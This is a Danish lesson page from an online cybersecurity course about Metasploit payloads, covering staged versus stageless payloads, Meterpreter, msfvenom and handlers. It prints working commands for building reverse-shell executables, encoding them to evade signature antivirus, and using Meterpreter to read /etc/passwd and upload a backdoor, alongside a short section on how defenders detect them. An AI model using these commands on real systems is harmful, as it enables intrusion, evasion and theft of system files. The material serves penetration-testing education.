Cyber Security Academy · Lektion

Payloads: Staged kontra stageless, Meterpreter

Vælg den rigtige payload til en situation, og brug Meterpreter efter exploitering.

Lektion 3 af 413 trin

Payloads: Staged kontra stageless, Meterpreter er en gratis Cyber Security Academy-lektion på CoddyKit. Dette er lektion 3 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Cyber Security Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Hvad er en payload?

En payload er den kode, der kører på målet efter et vellykket exploit. Den definerer, hvad angriberen får adgang til: en shell, kommandoeksekvering, filadgang eller en agent med alle funktioner som Meterpreter.

Staged- og stageless-payloads

Stageless-payloads (/) indeholder alt i én binærfil — de er større, men enklere, og kræver ingen netværksforbindelse tilbage efter den første levering. Staged-payloads (//) sender først en lille stager, som henter det andet trin fra handleren.

# Stageless (single slash naming):
windows/x64/shell_reverse_tcp

# Staged (double slash naming):
windows/x64/shell/reverse_tcp
#                 ^
#                 stage 2 downloaded after stager connects

Hvornår de forskellige typer bruges

Brug stageless, når målet ikke har adgang til internettet eller handleren efter det første exploit — payloaden skal være selvstændig. Brug staged, når du ønsker en mindre indledende payload og har en pålidelig forbindelse til handleren.

Oversigt over Meterpreter

Meterpreter er Metasploits avancerede payload — den kører udelukkende i hukommelsen, bruger krypteret kommunikation og leverer en omfattende API med adgang til filsystemet, procesmigrering, tastaturlogning, optagelse af skærmbilleder og pivotering.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > run

Meterpreter-kommandoer

Vigtige Meterpreter-kommandoer til efterfølgende udnyttelse omfatter systemoplysninger, procesliste, filhandlinger og netværk.

meterpreter > sysinfo          # system information
meterpreter > getuid           # current user
meterpreter > ps               # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell            # drop to OS shell

Procesmigrering

Flyt Meterpreter-processen ind i en mere stabil eller mindre mistænkelig proces (f.eks. explorer.exe på Windows). Det kan også give højere rettigheder, hvis processen flyttes til en proces med flere rettigheder.

meterpreter > ps
meterpreter > migrate 1234     # migrate to PID 1234

# Migrate to explorer.exe for stability
# Avoids termination if original process exits

Generering af payloads med msfvenom

msfvenom genererer selvstændige payload-filer (EXE, ELF, APK, shellcode), som kan leveres via phishing, USB-medier eller webskaller i autoriserede tests.

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o payload.elf

Multi/Handler til modtagelse af shells

Auxiliary-modulet multi/handler modtager forbindelser fra omvendte shells. Konfigurér det med den samme payload, LHOST og LPORT, som du brugte i msfvenom, før du leverer payloaden.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j      # run as background job

Grundlæggende kodning og undvigelse

msfvenom-encodere kan sløre payloads, så de omgår grundlæggende signaturbaseret antivirusregistrering. Bemærk: Moderne EDR bruger adfærdsbaseret registrering — encodere alene er ikke tilstrækkelige mod avanceret beskyttelse.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o encoded_payload.exe

Bind- og reverse-payloads

Reverse-payloads opretter forbindelse fra målet til angriberen (bedre i netværk med NAT eller firewalls). Bind-payloads lytter på målet — angriberen opretter forbindelse til det. Reverse foretrækkes i de fleste situationer.

Forsvareres registrering af payloads

Forsvarere registrerer Meterpreter via netværkssignaturer (mønstre i C2-trafik), scanning af hukommelsen (spor efter reflektiv DLL-injektion) og adfærdsanalyse (process hollowing, usædvanlige overordnede-underordnede relationer).

Hurtigt tjek

Hvad adskiller en staged-payload fra en stageless-payload i Metasploit?

Opsummering: Payloads og Meterpreter

Vælg staged-payloads for et lille indledende aftryk og stageless-payloads for selvstændig levering. Meterpreter er den mest funktionsrige payload til efterfølgende udnyttelse: den kører i hukommelsen, er krypteret og kan udvides. Brug msfvenom til at generere selvstændige binærfiler, og konfigurér altid multi/handler til at modtage forbindelser tilbage.

Gratis at komme i gang

Lær Cyber Security Academy med en AI-underviser — gratis

Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.

Kurser
76
Lektioner
303

Ofte stillede spørgsmål

Er lektionen “Payloads: Staged kontra stageless, Meterpreter” gratis?

Ja — alle 3 lektioner i læringssporet Cyber Security Academy, inklusive “Payloads: Staged kontra stageless, Meterpreter”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Hvad lærer jeg i “Payloads: Staged kontra stageless, Meterpreter”?

Vælg den rigtige payload til en situation, og brug Meterpreter efter exploitering. Du øver dig i Cyber Security Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.

Skal jeg have erfaring for at begynde på Cyber Security Academy?

Der kræves ingen tidligere erfaring. Cyber Security Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 3 af 4.

Hvor lang tid tager lektionen “Payloads: Staged kontra stageless, Meterpreter”?

De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.

Kan jeg skrive og køre kode i denne Cyber Security Academy-lektion?

Ja. Alle Cyber Security Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.

Alle lektioner i dette kursus

  1. Metasploit-arkitektur og msfconsole
  2. Udnyttelse af en kendt sårbarhed
  3. Payloads: Staged kontra stageless, Meterpreter
  4. Efter exploitering: Pivotering og persistens
← Tilbage til Cyber Security Academy